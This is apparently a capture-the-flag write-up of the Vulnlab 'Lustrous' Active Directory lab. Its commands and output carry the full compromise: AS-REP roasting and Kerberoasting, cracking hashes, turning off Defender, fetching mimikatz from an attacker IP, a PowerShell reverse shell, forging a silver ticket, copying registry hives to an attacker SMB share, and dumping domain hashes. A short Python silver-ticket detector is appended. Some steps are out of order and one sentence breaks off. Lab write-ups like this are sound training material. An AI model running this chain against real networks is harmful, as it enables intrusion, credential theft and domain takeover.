vulnlab lustrous
Lustrous is a medium-difficulty AD chain involving two machines, LusMS and LusDC. On LusMS, the anonymous FTP share exposed a list of usernames, one of which, ben.cox, did not require Kerberos pre-authentication, which allowed AS-REP roasting. With remote access to LusMS, the local Administrator password was found in the form of a PowerShell secure string that could be converted back to plaintext, giving the SYSTEM account. The web application on LusDC required Kerberos authentication; since there was a service account (svc_web) with an SPN, Kerberoasting produced its hash, which was cracked. With that password a silver ticket was forged as tony.ward, a member of the Backup Operators group, whose password could then be retrieved from the site. Using impacket-reg, the SAM, SYSTEM and SECURITY hives were retrieved, and with the LusDC machine account hash the NTDS.dit contents were dumped to obtain domain admin.
Writeup:
Enumerating the anonymous FTP share finds 3 users.
After this we check those users for AS-REP roasting (accounts that do not require Kerberos pre-authentication):
┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ impacket-GetNPUsers -usersfile users.txt lustrous.vl/Username@lusdC.lustrous.vl -no-pass -dc-ip 10.10.187.53
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

$krb5asrep$23$ben.cox@LUSTROUS.VL:6c2235fc542be350acb491b50c61c07d$a9feb90a9a6784eba15a6af651082f5e97f3805acbf9dd672bc3a74ffdf4ef8700e34fc732393af129f6779f8023711787ace5213a4d7397c06621048dcd6ced94bcc3030e>
[-] User rachel.parker doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User tony.ward doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User wayne.taylor doesn't have UF_DONT_REQUIRE_PREAUTH set
impacket-GetUserSPNs -dc-ip 10.10.187.53 -usersfile users.txt -request lustrous.vl/'ben.cox':'Trinity1'
Crack the hashes:
The hash identifier for Kerberos 5, etype 23, AS-REP hashes is 18200.
The hash identifier for Kerberos 5, etype 23, TGS-REP hashes is 13100.
You can find this within the hashcat example hashes page.
hashcat -m 18200 -o cracked.txt ben.cox.hash /usr/share/wordlists/rockyou.txt
Do some BloodHound analysis to find high-value targets:
bloodhound-python -d lustrous.vl -c all -u ben.cox -p Trinity1 -ns 10.10.187.53 --dns-tcp
$ impacket-GetUserSPNs Lustrous.vl/ben.cox:Trinity1 -dc-ip lusdc.lustrous.vl -request-user svc_web
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

ServicePrincipalName    Name     MemberOf  PasswordLastSet             LastLogon                   Delegation
----------------------  -------  --------  --------------------------  --------------------------  ----------
http/lusdc              svc_web            2021-12-22 13:46:12.670282  2021-12-27 13:45:43.927619
http/lusdc.lustrous.vl  svc_web            2021-12-22 13:46:12.670282  2021-12-27 13:45:43.927619

[-] CCache file is not found. Skipping...
$krb5tgs$23$*svc_web$LUSTROUS.VL$Lustrous.vl/svc_web*$fec3e242194f52c140173bb7e0b2df73$..snip..
hashcat -m 13100 -o cracked_svcweb.hash.txt svcweb.hash /usr/share/wordlists/rockyou.txt
WinRM to lusms.lustrous.vl:
evil-winrm --ip lusms.lustrous.vl -u 'ben.cox' -p 'Trinity1'
On Ben's Desktop we found admin.xml, an XML representation of a PSCredential object.
Following this blog post, we can extract the cleartext password from the file:
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> type admin.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">LUSMS\Administrator</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4ecf9dfb12aed4eab72b909047c4e560000000002000000000003660000c000000010000000d5ad4244981a04676e2b522e24a5e8000000000004800000a00000001000000072cd97a471d9d6379c6d8563145c9c0e48000000f31b15696fdcdfdedc9d50e1f4b83dda7f36bde64dcfb8dfe8e6d4ec059cfc3cc87fa7d7898bf28cb02352514f31ed2fb44ec44b40ef196b143cfb28ac7eff5f85c131798cb77da914000000e43aa04d2437278439a9f7f4b812ad3776345367</SS>
    </Props>
  </Obj>
</Objs>
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $user = "Administrator"
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4ecf9dfb12aed4eab72b909047c4e560000000002000000000003660000c000000010000000d5ad4244981a04676e2b522e24a5e8000000000004800000a00000001000000072cd97a471d9d6379c6d8563145c9c0e48000000f31b15696fdcdfdedc9d50e1f4b83dda7f36bde64dcfb8dfe8e6d4ec059cfc3cc87fa7d7898bf28cb02352514f31ed2fb44ec44b40ef196b143cfb28ac7eff5f85c131798cb77da914000000e43aa04d2437278439a9f7f4b812ad3776345367"
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4ecf9dfb12aed4eab72b909047c4e560000000002000000000003660000c000000010000000d5ad4244981a04676e2b522e24a5e8000000000004800000a00000001000000072cd97a471d9d6379c6d8563145c9c0e48000000f31b15696fdcdfdedc9d50e1f4b83dda7f36bde64dcfb8dfe8e6d4ec059cfc3cc87fa7d7898bf28cb02352514f31ed2fb44ec44b40ef196b143cfb28ac7eff5f85c131798cb77da914000000e43aa04d2437278439a9f7f4b812ad3776345367" | ConvertTo-SecureString
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $cred = New-Object System.Management.Automation.PSCredential($user, $pass)
*Evil-WinRM* PS C:\Users\ben.cox\Desktop> $cred.GetNetworkCredential() | Format-List

UserName       : Administrator
Password       : XZ9i=bgA8KhRP.f=jr**Qgd3Qh@n9dRF
SecurePassword : System.Security.SecureString
Domain         :

*Evil-WinRM* PS C:\Users\ben.cox\Desktop>
Log on as Administrator and make ben.cox a local admin:
┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ evil-winrm --ip lusms.lustrous.vl -u 'Administrator' -p 'XZ9i=bgA8KhRP.f=jr**Qgd3Qh@n9dRF'

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type flag.txt
VL{40<redacted>48}
*Evil-WinRM* PS C:\Users\Administrator\Desktop> net user puck Summer2024 /add
The command completed successfully.
*Evil-WinRM* PS C:\Users\Administrator\Desktop> net localgroup administrators puck /add
The command completed successfully.
*Evil-WinRM* PS C:\Users\Administrator\Desktop> net localgroup administrators ben.cox /add
The command completed successfully.
Look around
┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ xfreerdp /u:puck /p:'Summer2024' /v:lusms.lustrous.vl /cert:ignore /rfx

Start Edge, log in to https://lusdc.lustrous.vl as ben.cox and find the secure note.
We also have the password for the service account, so we can craft a ticket for any other user. See: https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets
We disable Windows Defender and upload mimikatz in our current PowerShell session, where we can then store a new ticket for the administrator account:
Set-MpPreference -DisableRealtimeMonitoring $true
iwr http://10.8.2.138/mimikatz.exe -OutFile mimikatz.exe
Then we use mkpsrevshell.py:
python3 mkpsrevshell.py 10.8.2.138 443
└─$ impacket-atexec 'administrator'@10.10.207.70 "powershell -e ..snip.."
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[!] This will work ONLY on Windows >= Vista
Password:
[*] Creating task \RqYvQaAv
[*] Running task \RqYvQaAv
[*] Deleting task \RqYvQaAv
[*] Attempting to read ADMIN$\Temp\RqYvQaAv.tmp
[*] Attempting to read ADMIN$\Temp\RqYvQaAv.tmp
All in one
PS C:\temp> .\mimikatz.exe "kerberos::purge" "kerberos::golden /sid:S-1-5-21-2355092754-1584501958-1513963426 /domain:lustrous.vl /id:1114 /target:lusdc.lustrous.vl /service:http /rc4:E67AF8B3D78DF5A02EB0D57B6CB60717 /ptt /user:tony.ward" "exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # kerberos::purge
Ticket(s) purge for current session is OK

mimikatz(commandline) # kerberos::golden /sid:S-1-5-21-2355092754-1584501958-1513963426 /domain:lustrous.vl /id:1114 /target:lusdc.lustrous.vl /service:http /rc4:E67AF8B3D78DF5A02EB0D57B6CB60717 /ptt /user:tony.ward
User      : tony.ward
Domain    : lustrous.vl (LUSTROUS)
SID       : S-1-5-21-2355092754-1584501958-1513963426
User Id   : 1114
Groups Id : *513 512 520 518 519
ServiceKey: e67af8b3d78df5a02eb0d57b6cb60717 - rc4_hmac_nt
Service   : http
Target    : lusdc.lustrous.vl
Lifetime  : 9/21/2024 6:04:01 PM ; 9/19/2034 6:04:01 PM ; 9/19/2034 6:04:01 PM
-> Ticket : ** Pass The Ticket **

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Golden ticket for 'tony.ward @ lustrous.vl' successfully submitted for current session

mimikatz(commandline) # exit
Bye!
PS C:\temp> iwr http://lusdc.lustrous.vl/Internal -UseBasicParsing -UseDefaultCredentials | Select-Object -Expand Content
PS C:\temp> whoami
nt authority\system
PS C:\temp> hostname
LusMS
PS C:\temp> klist

Current LogonId is 0:0x3e7

Cached Tickets: (1)

#0>     Client: tony.ward @ lustrous.vl
        Server: http/lusdc.lustrous.vl @ lustrous.vl
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
        Start Time: 9/21/2024 18:04:01 (local)
        End Time:   9/19/2034 18:04:01 (local)
        Renew Time: 9/19/2034 18:04:01 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0
        Kdc Called:

PS C:\temp> iwr http://lusdc.lustrous.vl/Internal -UseBasicParsing -UseDefaultCredentials | Select-Object -Expand Content
First we need the NTLM hash of the service account (svc_web):
┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ iconv -f ASCII -t UTF-16LE <(printf "iydgTvmujl6f") | openssl dgst -md4
MD4(stdin)= e67af8b3d78df5a02eb0d57b6cb60717
The following wmic command can be used to get the SID of tony.ward (or we use BloodHound for this); the last component, 1114, is the RID that goes into the /id parameter:
C:\Windows\system32>wmic useraccount where name='tony.ward' get sid
SID
S-1-5-21-2355092754-1584501958-1513963426-1114
We then use the NTLM hash in the /rc4 parameter:
kerberos::golden /domain:lustrous.vl /user:administrator /sid:S-1-5-21-2355092754-1584501958-1513963426 /rc4:e67af8b3d78df5a02eb0d57b6cb60717 /target:LusDC.lustrous.vl /service:http /ptt
and request our target website:
iwr http://lusdc.lustrous.vl/Internal -UseBasicParsing -UseDefaultCredentials | Select-Object -Expand Content
This gives us u
We had better not use an Administrator account for this, meaning we need to use another target; in our case we craft a silver ticket for tony.ward:
kerberos::golden /domain:lustrous.vl /user:tony.ward /sid:S-1-5-21-2355092754-1584501958-1513963426 /rc4:e67af8b3d78df5a02eb0d57b6cb60717 /target:LusDC.lustrous.vl /service:http /id:1114 /ptt
In an administrative cmd prompt:
C:\Windows\system32>runas.exe /noprofile /netonly /user:lustrous\ben.cox cmd.exe
Enter the password for lustrous\ben.cox: Trinity1
Attempting to start cmd.exe as user "lustrous\ben.cox" ...

C:\Windows\system32>
Then:
c:\temp>mimikatz

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # kerberos::golden /domain:lustrous.vl /user:tony.ward /sid:S-1-5-21-2355092754-1584501958-1513963426 /rc4:e67af8b3d78df5a02eb0d57b6cb60717 /target:LusDC.lustrous.vl /service:http /id:1114 /ptt
User      : tony.ward
Domain    : lustrous.vl (LUSTROUS)
SID       : S-1-5-21-2355092754-1584501958-1513963426
User Id   : 1114
Groups Id : *513 512 520 518 519
ServiceKey: e67af8b3d78df5a02eb0d57b6cb60717 - rc4_hmac_nt
Service   : http
Target    : LusDC.lustrous.vl
Lifetime  : 7/27/2024 7:28:18 PM ; 7/25/2034 7:28:18 PM ; 7/25/2034 7:28:18 PM
-> Ticket : ** Pass The Ticket **

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Golden ticket for 'tony.ward @ lustrous.vl' successfully submitted for current session

mimikatz # exit
Bye!

c:\temp>
c:\temp>klist

Current LogonId is 0:0x4900d

Cached Tickets: (1)

#0>     Client: tony.ward @ lustrous.vl
        Server: http/LusDC.lustrous.vl @ lustrous.vl
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
        Start Time: 7/27/2024 19:28:18 (local)
        End Time:   7/25/2034 19:28:18 (local)
        Renew Time: 7/25/2034 19:28:18 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0
        Kdc Called:

c:\temp>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\temp> Invoke-WebRequest -Uri http://lusdc.lustrous.vl/Internal -UseDefaultCredentials -UseBasicParsing | Select-Object -Expand Content
<h2>Notes</h2>
<p>Welcome, LUSTROUS\Tony.Ward!</p>
<div class="table">
<td> Password Reminder </td>
<td> U_cPVQ<redacted>0i1X </td>
<td> lustrous_tony.ward </td>
<td> <a class="btn btn-danger" href="/Internal
</table>
<input type="button" value="New Note" onclick="window.location.href='/Internal/CreateNote'" />
</div>
<hr />
<footer>
<p>© 2024 - SNotes</p>
</footer>
</div>
</body>
</html>
PS C:\temp>
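As an added detection-side example, not part of the original writeup, this Python script parses the klist output shown above (the SYSTEM session on LusMS earlier prints the same shape) and flags the properties that give the injected ticket away: a lifetime far beyond the default 10-hour service ticket policy, RC4 encryption, and no KDC recorded for the ticket. The function names and the policy value are my assumptions; the klist text is copied from the session above.

```python
import re
from datetime import datetime, timedelta

# klist output from the cmd session above (copied from the page).
KLIST_OUTPUT = """Current LogonId is 0:0x4900d

Cached Tickets: (1)

#0>     Client: tony.ward @ lustrous.vl
        Server: http/LusDC.lustrous.vl @ lustrous.vl
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
        Start Time: 7/27/2024 19:28:18 (local)
        End Time:   7/25/2034 19:28:18 (local)
        Renew Time: 7/25/2034 19:28:18 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0
        Kdc Called:
"""

# Assumption: default domain Kerberos policy, "Maximum lifetime for service ticket" = 600 minutes.
MAX_SERVICE_TICKET_LIFE = timedelta(hours=10)


def parse_klist(text: str) -> list:
    # One dict per "#n>" entry; every "Key: value" line below it becomes a lowercase key.
    tickets, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        m = re.match(r"#\d+>\s*Client:\s*(.+)", line)
        if m:
            cur = {"client": m.group(1).strip()}
            tickets.append(cur)
        elif cur is not None and ":" in line:
            key, _, value = line.partition(":")
            cur[key.strip().lower()] = value.strip()
    return tickets


def _parse_time(s: str) -> datetime:
    return datetime.strptime(s.replace("(local)", "").strip(), "%m/%d/%Y %H:%M:%S")


def ticket_lifetime(t: dict) -> timedelta:
    return _parse_time(t["end time"]) - _parse_time(t["start time"])


def assess_ticket(t: dict) -> list:
    # Indicators that a cached service ticket was forged and injected (silver ticket).
    findings = []
    life = ticket_lifetime(t)
    if life > MAX_SERVICE_TICKET_LIFE:
        findings.append(f"lifetime of {life.days} days exceeds the policy maximum of {MAX_SERVICE_TICKET_LIFE}")
    if "RC4" in t.get("kerbticket encryption type", ""):
        findings.append("RC4-HMAC service ticket: protected only by the service account's NT hash")
    if not t.get("kdc called"):
        findings.append("no KDC recorded: ticket was injected into the logon session, not issued by a DC")
    return findings
```

The 3650-day lifetime is mimikatz's default and is the single most reliable indicator here; on a real host the same check can be run over the output of klist for each logon session, and the matching server-side signal is an HTTP service logon on LusDC with no corresponding TGS request (event 4769) on the DC.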
PRIVESC
Logged in as Ben, right-click PowerShell and run it as user tony.ward:
PS C:\Users\ben.cox> whoami
lustrous\tony.ward
PS C:\Users\ben.cox> cd c:\temp
PS C:\temp> .\RegSave.exe -t lusdc.lustrous.vl --acl
[*] Identity: LocalService
 \_ Access Type: Allow
 \_ Registry Rights: -2147483648
 \_ Inherited: False
[*] Identity: LocalService
 \_ Access Type: Allow
 \_ Registry Rights: ReadKey
 \_ Inherited: False
[*] Identity: BUILTIN\Administrators
 \_ Access Type: Allow
 \_ Registry Rights: 268435456
 \_ Inherited: False
[*] Identity: BUILTIN\Administrators
 \_ Access Type: Allow
 \_ Registry Rights: FullControl
 \_ Inherited: False
[*] Identity: BUILTIN\Backup Operators
 \_ Access Type: Allow
 \_ Registry Rights: ReadKey
 \_ Inherited: False
PS C:\temp> .\RegSave.exe -t lusdc.lustrous.vl -o c:\windows\tasks\ --backup
[+] Exported \\lusdc.lustrous.vl\HKLM\SAM to c:\windows\tasks\3101BB00-F1ED-4F03-80F9-347F32D4F498
[+] Exported \\lusdc.lustrous.vl\HKLM\SYSTEM to c:\windows\tasks\B254B23F-CE5D-483A-9FAD-92192AF7CC4E
[+] Exported \\lusdc.lustrous.vl\HKLM\SECURITY to c:\windows\tasks\2190EDEF-05BB-4DF7-B94A-729F19F83BBE
PS C:\temp>
┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ impacket-smbclient lustrous.vl/tony.ward:U_cP<redacted>0i1X@lusdc.lustrous.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Type help for list of commands
# use C$
# shares
ADMIN$
C$
IPC$
NETLOGON
SYSVOL
# use C$
# cd windows\tasks
# ls
drw-rw-rw-          0  Sat Jul 27 13:51:14 2024 .
drw-rw-rw-          0  Sat May 27 20:32:06 2023 ..
-rw-rw-rw-      45056  Sat Jul 27 13:51:14 2024 2190EDEF-05BB-4DF7-B94A-729F19F83BBE
-rw-rw-rw-      28672  Sat Jul 27 13:51:12 2024 3101BB00-F1ED-4F03-80F9-347F32D4F498
-rw-rw-rw-   16965632  Sat Jul 27 13:51:13 2024 B254B23F-CE5D-483A-9FAD-92192AF7CC4E
-rw-rw-rw-          6  Sat Jul 27 11:50:13 2024 SA.DAT
# mget *
[*] Downloading 2190EDEF-05BB-4DF7-B94A-729F19F83BBE
[*] Downloading 3101BB00-F1ED-4F03-80F9-347F32D4F498
[*] Downloading B254B23F-CE5D-483A-9FAD-92192AF7CC4E
[*] Downloading SA.DAT
#
Or do it this way:
┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ impacket-smbserver smb . -smb2support
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.187.53,54551)
[*] AUTHENTICATE_MESSAGE (\,LUSDC)
[*] User LUSDC\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Connecting Share(1:smb)
[*] AUTHENTICATE_MESSAGE (LUSTROUS\LUSDC$,LUSDC)
[*] User LUSDC\LUSDC$ authenticated successfully
[*] LUSDC$::LUSTROUS:aaaaaaaaaaaaaaaa:a1abcb5128891908dd06050c91ebec30:0101000000000000002a54d31ee0da01c6fce3df3ca0410000000000010010006e0072006a00530065004b004f005800030010006e0072006a00530065004b004f00580002001000580070006f006200540046004900570004001000580070006f006200540046004900570007000800002a54d31ee0da0106000400020000000800300030000000000000000000000000400000e15257875fa1332fbc03b8a4fe3db518132560a8e7b113c3bb02a72a24cd55ff0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e0038002e0032002e003100330038000000000000000000
[*] AUTHENTICATE_MESSAGE (LUSTROUS\LUSDC$,LUSDC)
[*] User LUSDC\LUSDC$ authenticated successfully
[*] ..snip..
[*] Disconnecting Share(1:smb)
[*] Closing down connection (10.10.187.53,54551)
[*] Remaining connections []
┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ impacket-reg lustrous.vl/'tony.ward':'U_cP<redacted>0i1X'@10.10.187.53 -dc-ip 10.10.187.53 backup -o \\\\10.8.2.138\\smb
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[!] Cannot check RemoteRegistry status. Triggering start trough named pipe...
[*] Saved HKLM\SAM to \\10.8.2.138\smb\SAM.save
[*] Saved HKLM\SYSTEM to \\10.8.2.138\smb\SYSTEM.save
[*] Saved HKLM\SECURITY to \\10.8.2.138\smb\SECURITY.save
Now get the machine hashes:
┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ impacket-secretsdump -sam SAM.save -system SYSTEM.save -security SECURITY.save LOCAL
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Target system bootKey: 0x9619c4c8e8d0c1e1314ca899f5573926
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:1e<redacted>97:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:7c8bc87fdc872e790bbf7789dba9ca54bdcd339a4858b7f0400af019b1ea70c306ca1aa097c61c16db78634d36d95d639e9e5e9486f2ac9366898ab26783e513d475edb080e42b9aa2643b83b6fcca12a57e4232154ad8aa34c32b6d7d3182d2509d8b34990dd5c23852c0149382c412bf45352f3ae8a490a454e6bd4c64a3e441f6dbeecf5f48baedbe7ddae74dd77813392a73150fa751e33f8ac0338877c7f09e54e1baef33094f8a716cd1ccc389027d80c1b834d35edd8cb926a8ba3841ca8f6afb3fa9f53c9fb11c6483ebd1f3127725c2bb160ca325869e91e2136192b454c95bdd4b662f8596518dee210daf
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:28<redacted>54
[*] DPAPI_SYSTEM
dpapi_machinekey:0x908c1b9d1eba6062f66247d016952eab010c4f62
dpapi_userkey:0xe7d85d4c5db116a07bd02c655623691eae32c387
[*] NL$KM
 0000   B6 96 C7 7E 17 8A 0C DD  8C 39 C2 0A A2 91 24 44   ...~.....9....$D
 0010   A2 E4 4D C2 09 59 46 C0  7F 95 EA 11 CB 7F CB 72   ..M..YF........r
 0020   EC 2E 5A 06 01 1B 26 FE  6D A7 88 0F A5 E7 1F A5   ..Z...&.m.......
 0030   96 CD E5 3F A0 06 5E C1  A5 01 A1 CE 8C 24 76 95   ...?..^......$v.
NL$KM:b696c77e178a0cdd8c39c20aa2912444a2e44dc2095946c07f95ea11cb7fcb72ec2e5a06011b26fe6da7880fa5e71fa596cde53fa0065ec1a501a1ce8c247695
[*] Cleaning up...
Get the users' hashes:
┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ impacket-secretsdump lustrous.vl/'LUSDC$'@lusdc.lustrous.vl -hashes aad3b435b51404eeaad3b435b51404ee:28<redacted>54 -just-dc-user Administrator
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:b8<redacted>76:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:192dc734a2de3bc95bad85d2f4e3380a89ed9edb2341b124745d5dbf7ccdf6bd
Administrator:aes128-cts-hmac-sha1-96:854da5162b192ac9e6d3e15e52d326ff
Administrator:des-cbc-md5:c110a4f7f80d5d86
[*] Cleaning up...
Evil-WinRM to the DC:
┌──(puck㉿kali)-[~/vulnlab/lustrous]
└─$ evil-winrm --ip lusdc.lustrous.vl -u 'Administrator' -H 'b8<redacted>76'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
LusDC
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt
VL{53<redacted>0b}
That was fun!